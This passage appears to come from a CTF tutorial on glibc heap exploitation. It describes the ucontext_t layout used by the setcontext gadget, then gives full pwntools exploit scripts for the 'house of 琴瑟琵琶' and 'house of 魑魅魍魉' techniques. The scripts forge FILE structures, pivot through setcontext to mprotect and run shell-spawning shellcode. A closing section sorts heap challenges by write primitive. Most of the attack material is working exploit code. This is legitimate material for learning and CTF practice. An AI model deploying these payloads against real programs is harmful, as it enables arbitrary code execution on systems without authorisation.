__extension__ unsigned long long int __ssp[4]; // used by setcontext (4)
} ucontext_t;

setcontext operates only on mcontext_t uc_mcontext, sigset_t uc_sigmask, struct _libc_fpstate __fpregs_mem and __ssp, and touches nothing else, so the other fields can be ignored.

  1. uc_sigmask: the signal mask. In testing, all zeros works; a mask copied from another program can also be used.

  2. uc_mcontext: the structure that stores the registers, and also what the usual setcontext+53 gadget uses. It is defined as follows:

typedef struct
{
gregset_t __ctx(gregs);
/* Note that fpregs is a pointer. */
fpregset_t __ctx(fpregs);
__extension__ unsigned long long __reserved1 [8];
} mcontext_t;
typedef greg_t gregset_t[__NGREG];

#ifdef __USE_GNU
/* Number of each register in the `gregset_t' array. */
enum
{
REG_R8 = 0,
# define REG_R8 REG_R8
REG_R9,
# define REG_R9 REG_R9
REG_R10,
# define REG_R10 REG_R10
REG_R11,
# define REG_R11 REG_R11
REG_R12,
# define REG_R12 REG_R12
REG_R13,
# define REG_R13 REG_R13
REG_R14,
# define REG_R14 REG_R14
REG_R15,
# define REG_R15 REG_R15
REG_RDI,
# define REG_RDI REG_RDI
REG_RSI,
# define REG_RSI REG_RSI
REG_RBP,
# define REG_RBP REG_RBP
REG_RBX,
# define REG_RBX REG_RBX
REG_RDX,
# define REG_RDX REG_RDX
REG_RAX,
# define REG_RAX REG_RAX
REG_RCX,
# define REG_RCX REG_RCX
REG_RSP,
# define REG_RSP REG_RSP
REG_RIP,
# define REG_RIP REG_RIP
REG_EFL,
# define REG_EFL REG_EFL
REG_CSGSFS, /* Actually short cs, gs, fs, __pad0. */
# define REG_CSGSFS REG_CSGSFS
REG_ERR,
# define REG_ERR REG_ERR
REG_TRAPNO,
# define REG_TRAPNO REG_TRAPNO
REG_OLDMASK,
# define REG_OLDMASK REG_OLDMASK
REG_CR2
# define REG_CR2 REG_CR2
};
#endif
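  3. __fpregs_mem: corresponds to the following instructions in setcontext, which load the floating-point environment. fldenv reads through the uc_mcontext.fpregs pointer stored at offset 0xe0 (normally pointing to __fpregs_mem), so that pointer must reference valid memory; the exps below use a writable heap address.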
/* Restore the floating-point context.  Not the registers, only the
rest. */
movq oFPREGS(%rdx), %rcx
fldenv (%rcx)
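  4. MXCSR: corresponds to the following instruction in setcontext, which loads the MXCSR register from offset 0x1c0 (the mxcsr field inside __fpregs_mem; __ssp is only used on the shadow-stack path). In testing, 0 also works.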
ldmxcsr oMXCSR(%rdx)
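The offsets quoted above follow from the structure definitions. A sketch computing them, assuming the x86_64 glibc sizes (stack_t is 24 bytes, __NGREG is 23, sigset_t is 1024 bits, mxcsr sits 24 bytes into struct _libc_fpstate); the results should correspond to the oRDI, oRSP, oRIP, oFPREGS, oSIGMASK and oMXCSR constants used in setcontext.S. `greg_offset` is a hypothetical helper.

```python
# gregs[] index order from the REG_* enum above (first 17 entries only)
GREG_NAMES = ["R8", "R9", "R10", "R11", "R12", "R13", "R14", "R15",
              "RDI", "RSI", "RBP", "RBX", "RDX", "RAX", "RCX", "RSP", "RIP"]

NGREG = 23                                      # __NGREG on x86_64
GREGS_OFFSET = 8 + 8 + 24                       # uc_flags, uc_link, stack_t uc_stack
FPREGS_OFFSET = GREGS_OFFSET + NGREG * 8        # uc_mcontext.fpregs pointer
SIGMASK_OFFSET = FPREGS_OFFSET + 8 + 8 * 8      # skip fpregs and __reserved1[8]
FPREGS_MEM_OFFSET = SIGMASK_OFFSET + 1024 // 8  # sigset_t holds 1024 bits
MXCSR_OFFSET = FPREGS_MEM_OFFSET + 24           # mxcsr field of struct _libc_fpstate


def greg_offset(name):
    """Offset of gregs[REG_<name>] inside ucontext_t."""
    return GREGS_OFFSET + 8 * GREG_NAMES.index(name)
```

For instance greg_offset("RSP") gives 0xa0 and greg_offset("RIP") gives 0xa8, the slots the exps fill with __rsp and __rip.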

exp

ucontext =b''
ucontext += p64(0)*5
mprotect_len = 0x20000
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0

# When padding below is empty, fake_io_addr is where ucontext starts
padding = fake_io_file
payload_start_addr = fake_io_addr
# 0x2e8 is the value printed by print("IO_FILE len is",hex(len(payload))) below
# add 0x10 when using a largebin attack
__rsp = payload_start_addr + 0x2e8 + 0x10
__rip = mprotect_addr
ucontext += p64(0)*8
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rax) # gregs order is ... RDX, RAX, RCX, RSP, RIP
ucontext += p64(__rcx)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
ucontext += p64(heap_addr+0x6000) # fldenv [rcx] loads the floating-point environment; must point to valid (here writable) memory
print("ucontext len is:",hex(len(ucontext))) # 0xe8

'''
ucontext = ucontext.ljust(0x128,b'\x00')

# signal mask; all zeros seems to work; 0x10 words
ucontext += p64(0)*0x10
# ucontext += p64(0)+p64(0x0000002000000000)+p64(0)+p64(0)+p64(0x0000034000000340)+p64(0x0000000000000001)+p64(0x0000000103ae75f6)+p64(0)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0)

ucontext =ucontext.ljust(0x1c0,b'\x00')

# ucontext += p64(0x1f80) # LDMXCSR [rdx+0x1c0] loads the MXCSR register; 0 seems to work too
'''

# the payload can start at fake_io_file, or directly at ucontext
payload = padding + ucontext

# 0x2e8 here matches __rsp
print("IO_FILE len is",hex(len(payload)))
# write your own shellcode
shellcode = """

"""

# add 0x10 when using a largebin attack
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10)

payload += bytes(asm(shellcode))
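Filling the register slots by name rather than by position avoids slot-order mistakes (in gregs, RAX comes before RCX). A minimal sketch using struct.pack instead of pwntools' p64; `build_ucontext`, `demo` and the addresses are hypothetical, and the RIP value is only a placeholder for the address of mprotect.

```python
import struct

# gregs[] order from the REG_* enum (first 17 entries)
GREG_NAMES = ["R8", "R9", "R10", "R11", "R12", "R13", "R14", "R15",
              "RDI", "RSI", "RBP", "RBX", "RDX", "RAX", "RCX", "RSP", "RIP"]


def build_ucontext(regs, fpregs_ptr):
    """Pack ucontext_t up to and including uc_mcontext.fpregs (0xe8 bytes).
    regs maps register names to values; registers not given are zero."""
    unknown = set(regs) - set(GREG_NAMES)
    if unknown:
        raise ValueError(f"unknown registers: {sorted(unknown)}")
    buf = b"\x00" * 0x28                  # uc_flags, uc_link, uc_stack
    for name in GREG_NAMES:
        buf += struct.pack("<Q", regs.get(name, 0))
    buf = buf.ljust(0xe0, b"\x00")        # remaining gregs slots
    buf += struct.pack("<Q", fpregs_ptr)  # read by fldenv, must be mapped
    return buf


def demo():
    """mprotect(heap, 0x20000, 7) with hypothetical addresses."""
    heap = 0x555555559000
    return build_ucontext({"RDI": heap, "RSI": 0x20000, "RDX": 7,
                           "RBP": heap + 0x20000, "RSP": heap + 0x3000,
                           "RIP": 0x7ffff7eb0000}, heap + 0x6000)
```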

Complete versions (combined with house of 一骑当千)

house of 琴瑟琵琶

exp
fake_io_addr = heap_addr + 0x1390
obstack_ptr = fake_io_addr + 0x30
fake_io_file = b''
fake_io_file = fake_io_file.ljust(0x58,b'\x00')
fake_io_file += p64(setcontext_addr) # function to call (obstack->chunkfun)
fake_io_file += p64(0)
fake_io_file += p64(fake_io_addr+0xe8) # rdi of the called function (obstack->extra_arg)
fake_io_file += p64(1) # obstack->use_extra_arg=1
fake_io_file += p64(heap_addr+0x2000) # _IO_lock_t *_lock;
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_obstack_jumps_addr + 0x20) # vtable shifted by 0x20 so the overflow slot hits _IO_obstack_xsputn
fake_io_file += p64(obstack_ptr) # struct obstack *obstack
print(hex(len(fake_io_file))) # largebin attack, so 0xd8 = 0xe8 - 0x10
# pause()

# contents stored at the address passed as rdi (the ucontext)
ucontext = b''
ucontext += p64(0)*13
mprotect_len = 0x20000
tcache_thead_size = 0x290
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0
# alternative __rsp: heap_addr + tcache_thead_size + 0x10000 # when calling system, the stack frame must be large enough
# 0x1c0 is the value printed by print("payload len is",hex(len(payload))) below
# add 0x10 when using a largebin attack
__rsp = fake_io_addr + 0x1c0 + 0x10
__rip = mprotect_addr #execve_addr #mprotect_addr
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rax) # gregs order is ... RDX, RAX, RCX, RSP, RIP
ucontext += p64(__rcx)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
ucontext += p64(heap_addr+0x6000) # fldenv [rcx] loads the floating-point environment; must point to valid (here writable) memory

payload = fake_io_file + ucontext
print("payload len is",hex(len(payload))) # 0x1c0, matches __rsp
# pause()
shellcode = asm(shellcraft.sh())
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10) # add 0x10 when using a largebin attack
payload = payload + bytes(shellcode)
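The magic numbers in this exp are related: ucontext must start exactly at extra_arg, and __rsp must point at the qword appended after the payload, which mprotect returns into. A small sketch of that arithmetic, assuming the lengths printed by the exp (0xd8 for the FILE part, 0xe8 for the ucontext part); `qinse_layout` is a hypothetical helper.

```python
LARGEBIN_HDR = 0x10   # the payload is written 0x10 past fake_io_addr
FILE_PART = 0xd8      # len(fake_io_file): ends after the obstack pointer
UCONTEXT_PART = 0xe8  # ucontext up to and including the fpregs pointer


def qinse_layout(fake_io_addr):
    """Addresses implied by the combined house of 琴瑟琵琶 exp."""
    payload_len = FILE_PART + UCONTEXT_PART
    rsp = fake_io_addr + payload_len + LARGEBIN_HDR
    return {
        "ucontext": fake_io_addr + LARGEBIN_HDR + FILE_PART,  # == extra_arg
        "payload_len": payload_len,
        "rsp": rsp,            # holds the return address used after mprotect
        "shellcode": rsp + 8,  # fake_io_addr + len(payload) + 0x8 + 0x10
    }
```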

house of 魑魅魍魉

exp
# house of 魑魅魍魉 via a largebin attack
# simulates a single write: the payload has to be written in advance
# to run reliably, the COMPILE_WPRINTF == 1 variant is used

fake_io_addr = heap_addr + 0x1390
put_stream_offset = 0x30 # offset of put_stream from fake_io
put_stream_addr = fake_io_addr + put_stream_offset
write_target_addr = memcpy_addr
target_value_offset = 0x200 # offset from fake_io of the slot holding the function to call
target_value_addr = fake_io_addr + target_value_offset


IO_wide_data_addr = fake_io_addr + 0xe0 # right after _IO_FILE_plus (0xe0): reuse helper_file's own _wide_data member
# rdi when memcpy runs the second time
rdi_offset = 0xf # _IO_write_ptr is incremented by 1, so this keeps the final address aligned
rdi_ucontext_addr = target_value_addr + rdi_offset
# used = more_len >> 2 must be at least count_len + 22 for memcpy to run a second time
more_len = 0x80*8 # byte distance; _IO_helper_overflow divides it by 4 (wchar_t *), so used = 0x100
count_len= 0x28 # must be greater than 20
_flags = 0x400 # with _flags == 0x400, fp->_IO_write_ptr = fp->_IO_read_ptr; is executed


fake_io_file = b""
fake_io_file = fake_io_file.ljust(0x20,b'\x00')
fake_io_file += p64(_flags) # start of put_stream; _flags == 0x400 executes fp->_IO_write_ptr = fp->_IO_read_ptr;
fake_io_file += p64(rdi_ucontext_addr) # put_stream->_IO_read_ptr
fake_io_file += p64(0)*2
fake_io_file += p64(write_target_addr - 0x20) # put_stream->_IO_write_base
fake_io_file += p64(write_target_addr) # put_stream->_IO_write_ptr: destination of the first memcpy
fake_io_file += p64(write_target_addr + count_len) # put_stream->_IO_write_end
fake_io_file += p64(0) # put_stream->_IO_buf_base
# bypasses if (pos >= (size_t) (_IO_blen (fp) + flush_only)) so malloc is not reached
fake_io_file += p64((1<<64)-1) # put_stream->_IO_buf_end
fake_io_file += p64(0)*2
fake_io_file += p64(heap_addr+0x2000) # fake_io->_lock, must be writable
fake_io_file += p64(0)*2
fake_io_file += p64(IO_wide_data_addr) # fake_io->_wide_data
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_help_jump_0_addr) # fake_io vtable: _IO_helper_jumps
fake_io_file += p64(0)
fake_io_file += p64(heap_addr+0x2000) # writable
fake_io_file += p64(0)
fake_io_file += p64(target_value_addr) # _wide_data->_IO_write_base: data source for the first memcpy
fake_io_file += p64(target_value_addr + more_len) # _wide_data->_IO_write_ptr
fake_io_file += p64(IO_str_jumps_addr) # put_stream vtable: _IO_str_jumps
fake_io_file = fake_io_file.ljust(0x1b8,b'\x00')
fake_io_file += p64(put_stream_addr) # helper_file->_put_stream
fake_io_file = fake_io_file.ljust(target_value_offset - 0x10,b"\x00") # subtract 0x10 for the largebin attack

# the function to call is setcontext, at offset target_value_offset from fake_io
fake_io_file += p64(setcontext_addr) + p64(0) # this part is 0x10 long, matching rdi_offset + 1


ucontext =b""
ucontext += p64(0)*13
mprotect_len = 0x20000
tcache_thead_size = 0x290
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0
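# alternative __rsp: heap_addr + tcache_thead_size + 0x10000 # when calling system, the stack frame must be large enough
# 0x2e8 is the value printed by print("payload len is",hex(len(payload))) below
# add 0x10 when using a largebin attack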
__rsp = fake_io_addr + 0x2e8 + 0x10
__rip = mprotect_addr #execve_addr #mprotect_addr
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rax) # gregs order is ... RDX, RAX, RCX, RSP, RIP
ucontext += p64(__rcx)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
ucontext += p64(heap_addr+0x6000) # fldenv [rcx] loads the floating-point environment; must point to valid (here writable) memory


payload = fake_io_file + ucontext
print("payload len is",hex(len(payload))) # 0x2e8, matches __rsp
shellcode = asm(shellcraft.sh())
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10) # add 0x10 when using a largebin attack
payload += bytes(shellcode)
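The offsets in this exp can be cross-checked against the structures discussed above. A sketch under stated assumptions: sizeof(struct _IO_wide_data) is taken as 0xe8 on x86_64 (so _put_stream sits 0x1c8 from the FILE start), the payload is written 0x10 past fake_io_addr, and `kmwl_layout` is a hypothetical helper.

```python
LARGEBIN_HDR = 0x10
PUT_STREAM_OFF = 0x30
TARGET_VALUE_OFF = 0x200
RDI_OFF = 0xf
SIZEOF_IO_FILE_PLUS = 0xe0
SIZEOF_IO_WIDE_DATA = 0xe8  # assumption: x86_64 glibc, _wide_vtable at +0xe0


def kmwl_layout(fake_io_addr):
    """Payload offsets (absolute address - fake_io_addr - 0x10) implied by
    the house of 魑魅魍魉 exp, plus a check on the second memcpy's rdi."""
    def off(addr):
        return addr - fake_io_addr - LARGEBIN_HDR

    put_stream = fake_io_addr + PUT_STREAM_OFF
    target = fake_io_addr + TARGET_VALUE_OFF
    ucontext = target + 0x10  # after setcontext_addr + p64(0)
    helper_put_stream = fake_io_addr + SIZEOF_IO_FILE_PLUS + SIZEOF_IO_WIDE_DATA
    return {
        "put_stream_flags": off(put_stream),
        "put_stream_vtable": off(put_stream + 0xd8),
        "helper_put_stream": off(helper_put_stream),
        "ucontext": off(ucontext),
        # _IO_str_overflow: write_ptr = read_ptr, then ++ -> rdi of 2nd memcpy
        "second_rdi_ok": target + RDI_OFF + 1 == ucontext,
    }
```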

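Summary

Heap challenges can be classified along a few dimensions:

  1. The number of memory writes: some challenges allow multiple (two or more) writes, others only one.
  2. The kind of write: some allow arbitrary writes, i.e. the memory can be allocated and filled freely; others do not, and only a heap value or an unsorted bin address can be written, e.g. with a largebin attack.
  3. Leaks: apart from a few techniques, most require a memory leak, and some challenges also allow leaking data in memory a second time, e.g. leaking ptr_guard, which I call a "second leak". Except in special cases, a second leak requires being able to allocate memory at the location to be leaked; clearly, without the ability to write arbitrarily, a second leak is impossible (contrived challenges that set a flag excepted).

1. Memory writes: any address, unlimited times, arbitrary data; second leak possible

This is the easiest case. Before 2.34 target the hooks; from 2.34 on, EOP or wide_IO both work. If IO functions are available, house of 秦月汉关 is another option. These are mostly tcache-based.

2. Memory writes: any address, unlimited times, arbitrary data; no second leak

Basically the same as above; without a second leak, we can simply overwrite the target outright.

3. Memory writes: any address, once, arbitrary data; second leak possible

Before 2.34 target the hooks; from 2.34 on, EOP or wide_IO both work. Since a second leak is possible, EOP is also usable.

4. Memory writes: any address, once, arbitrary data; no second leak

Before 2.34 target the hooks; from 2.34 on, vtable, EOP or wide_IO all work.

Note: this is the turning point. Generally, if memory can be written arbitrarily, that memory can be allocated, and in that case overwriting a hook is very direct and simple; even though the hooks are gone after 2.34, attacks are still possible by overwriting vtables, EOP and similar means. If memory cannot be written arbitrarily, the attack can only go through IO.

5. Memory writes: any address, unlimited times, heap values only; second leak possible (impossible)

If memory cannot be written arbitrarily, it cannot be allocated, so a second leak is essentially impossible.

6. Memory writes: any address, unlimited times, heap values only; no second leak

Being able to write heap values multiple times leaves many options: house of emma is one, and the wide-character templates also work.

7. Memory writes: any address, once, heap values only; second leak possible (impossible)

Same as 5.

8. Memory writes: any address, once, heap values only; no second leak

Here IO must be forged, using existing chains such as apple, cat, 魑魅魍魉 and 琴瑟琵琶.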